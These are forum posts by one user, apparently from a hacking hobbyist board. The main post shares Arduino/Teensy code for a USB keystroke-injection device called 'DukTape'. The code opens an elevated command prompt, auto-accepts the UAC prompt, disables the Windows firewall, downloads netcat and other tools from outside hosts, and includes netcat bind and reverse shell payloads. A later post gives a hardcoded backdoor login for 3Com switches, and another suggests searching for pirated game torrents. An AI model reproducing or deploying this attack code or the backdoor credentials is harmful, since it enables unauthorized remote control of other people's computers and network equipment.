str33ts0ld13r

I haven't had any problems with it. Ill put a yes vote in.

Greetings ducky lovers! Im very excited to finally be making a contribution to the rubber ducky project. To get started you will need arduino and the phukdlib. DukTape is nothing fancy (pun intended ). It will get you wget and a few other toys like nc then it opens a back door for you to get in. When complete it blinks (big surprise right!! haha) There is MUCH room for improvement on this but I sadly haven't had time to work on this as much as I would like.. Anyway I wanted to share what I have put together so far. Please feel free to modify, add, change what ever you like in this code. All that I ask is that you post you changes for the rest of the ducky community. As always constructive criticism is welcome and appreciated. Warning: I have NOT had a chance to test this code with my teensy yet (had some hardware failure on my test boxes :( ). But it compiles fine for me. Warning2: I haven't set up a kill switch feature yet to keep it from running on systems you dont want it to (ie your own system). So you have been warned, it runs every time you plug it in! UPDATE: I just added a UAC handler and changed the way the cmd is launched to go through the start menu using ctrl and esc keys. (thanks H@L0_F00 for the ctrl esc combo you posted) and (thanks Jonny_Walked I used some of the code you posted, UAC handler, and used your cmd launcher)(If this code was Benownzu93's I thank you). Also the PHUCKED lib is no longer needed with the updated cmd launcher. /* ################################ ###########DukTape############## ################################ Readme: To use DukTape make sure you have the phukdlib installed in arduino. I would like to thank everyone on the Rubber Ducky forums http://www.hak5.org/forums/index.php?showforum=56 who I borrowed ideas and code from. Debug is done through the serial monitor. To disable it comment out/remove the code marked as debug (ie.. //debug). Delays may need to be adjusted... */ int ledPin = 11; void setup() { delay(5000); //initial delay pinMode(ledPin, OUTPUT); Serial.begin(9600); //debug delay(200); //debug Serial.println("START");//debug //start cmd hidden CMD(); delay(1000); MoveWin(); //prepare work area TypeCmd("mkdir %systemroot%\\winduk"); TypeCmd("cd %systemroot%\\winduk"); TypeCmd("netsh firewall set opmode disable");//kill firewall //ftp download wget TypeCmd("echo bin >>ftpcmd.txt"); TypeCmd("echo cd /tex-archive/systems/texlive/tlnet/tlpkg/installer/wget/ >>ftpcmd.txt"); TypeCmd("echo get wget.exe >>ftpcmd.txt"); TypeCmd("echo quit >>ftpcmd.txt"); TypeCmd("ftp -A -v -s:ftpcmd.txt cam.ctan.org"); //run ftp download delay(6000); TypeCmd("if NOT exist wget.exe ftp -A -v -s:ftpcmd.txt cam.ctan.org");//error recovery in case of wget download fail Serial.println("Ftp completed");//debug //Get more tools TypeCmd("if NOT exist unzip.exe wget -q http://stahlworks.com/dev/unzip.exe"); //get unzip TypeCmd("if NOT exist nircmd.zip wget -q http://www.nirsoft.net/utils/nircmd.zip");//get nircmd TypeCmd("if NOT exist nircmdc.exe unzip.exe -qq nircmd.zip"); //unzip nircmd TypeCmd("if NOT exist nc111nt.zip wget -q http://joncraton.org/media/files/nc111nt.zip"); //get netcat TypeCmd("if NOT exist nc.exe unzip.exe -qq nc111nt.zip nc.exe");//unzip netcat //Payload //TypeCmd("nc -l -p 1337 -d -e cmd.exe");//netcat listens on port leet and launches cmd when a connection is established /*TypeCmd("nc -d IP PORT -e cmd.exe");/*reverse netcat replace IP with your ipaddress and replace PORT with the port you use on the system you want to connect back to, run "nc -l -p PORT" without the quotes on your system to accept the reverse connection*/ //clean up TypeCmd("if Exist nircmdc.exe del /Q nircmd.zip"); TypeCmd("if EXIST ftpcmd.txt del /Q ftpcmd.txt"); TypeCmd("if EXIST nc111nt.zip del /Q nc111nt.zip"); TypeCmd("exit");//close cmd. Serial.println("ALL DONE!");//debug } void loop() { digitalWrite(ledPin, HIGH);// LED on delay(500); digitalWrite(ledPin, LOW);// LED off delay(500); } void Enter() { Keyboard.set_key1(KEY_ENTER); Keyboard.send_now(); Keyboard.set_key1(0); Keyboard.send_now(); delay(100); } void TypeCmd(char *commandtotype) { //must have cmd prompt open to work Keyboard.println("*commandtotype"); delay(200); Enter(); delay(2000);//Execution delay Serial.println("*commandtotype");//debug } void MoveWin() { Keyboard.set_modifier(MODIFIERKEY_ALT); Keyboard.set_key1(KEY_SPACE); Keyboard.set_key2(KEY_M); Keyboard.send_now(); delay(50); Keyboard.set_modifier(0); Keyboard.set_key1(0); Keyboard.set_key2(0); Keyboard.send_now(); delay(50); for(int x=0; x<200; ++x){ Keyboard.set_key1(KEY_UP); Keyboard.send_now(); Keyboard.set_key1(0); Keyboard.send_now(); delay(100); } Enter(); } void UAC() { Keyboard.set_modifier(MODIFIERKEY_ALT); Keyboard.set_key1(KEY_Y); Keyboard.send_now(); delay(100); Keyboard.set_modifier(0); Keyboard.set_key1(0); Keyboard.send_now(); } void CMD() { Keyboard.set_modifier(MODIFIERKEY_CTRL); Keyboard.set_key1(KEY_ESC); Keyboard.send_now(); Keyboard.set_modifier(0); Keyboard.set_key1(0); Keyboard.send_now(); Keyboard.print("cmd"); delay(1000); Keyboard.set_modifier(MODIFIERKEY_CTRL | MODIFIERKEY_SHIFT); Keyboard.set_key1(KEY_ENTER); Keyboard.send_now(); Keyboard.set_modifier(0); Keyboard.set_key1(0); Keyboard.send_now(); delay(2000); UAC(); }

I want to give a huge thanks to Darren for the ducky kit!! mine showed up today. The mail actually delivered it to the next street over but the guy that lives there brought it over! maybe I should head to the casino with luck like this

Got signed up, been waiting about 10 hours for this lol. Hope I make the cut, and didn't stay up for 24 hours for nothing lol. Good luck to everyone else too. Im really happy to see so much support for this so quickly!! Now its time to take a nap..

that's a sweet setup. especially the duel wan.. however i don't think that the tucked away to look normal concept really works (its ok though i still tuck mine away to look normal too, although it really doesn't work for me neither lol).

get a new os...

thats sweet man. ive been playing with it in a VM for a few hours. i haven't had any problems with it. a few suggestions i could make would be to add cain & able (i know its a tool that is looked down upon but there is no denying that it dose have a lot of useful features) maybe wireshark. i like how the UI is real simple and not cluttered with things that you dont need. im really looking forward to the future releases! if i can help with anything pm me.

hell they dont need to put cameras or mic's in anyone's house we all put them there for them. ie cell phone regular phone web cam plus there are the billions of security / traffic cams they have.. they can tap everything anyway....

damn i hate being broke.. i always like picking up new equipment...

or you can always go with game name filetype:torrent in a google search. makes things real nice and fast.

you can just get a free shell account from somewhere that allows ssh (most do) and tunnel through that. what i use for my tunnels is my hp server LC2000 (i know its ancient but it works for me plus it was free). you always do have the option of just taking one of the junk computers you probably have laying around and putting linux on it. ubuntu is really really easy to set up, then just connect it to your network and run it headless. thats usually a cheap way. if you dont have a crapo machine laying around, garage sales are usually a good place to find one.

so are we going to get back on topic or what people?

where the hell is this thing legal for free. i ran tor through like 30 different countries and the best i could find is access to the premium one....

all very good videos ive had them for quite a while and watch them regularly.

starchfish: for the 3com firmware 7.0.1 and 8.1.1 (you should be able to get the firmware here if you dont have it infodeli.3com.com) there is a back door login of debug with the password synnet just telnet in. its a major security flaw that they put in that you should probably fix once you get your switches back up..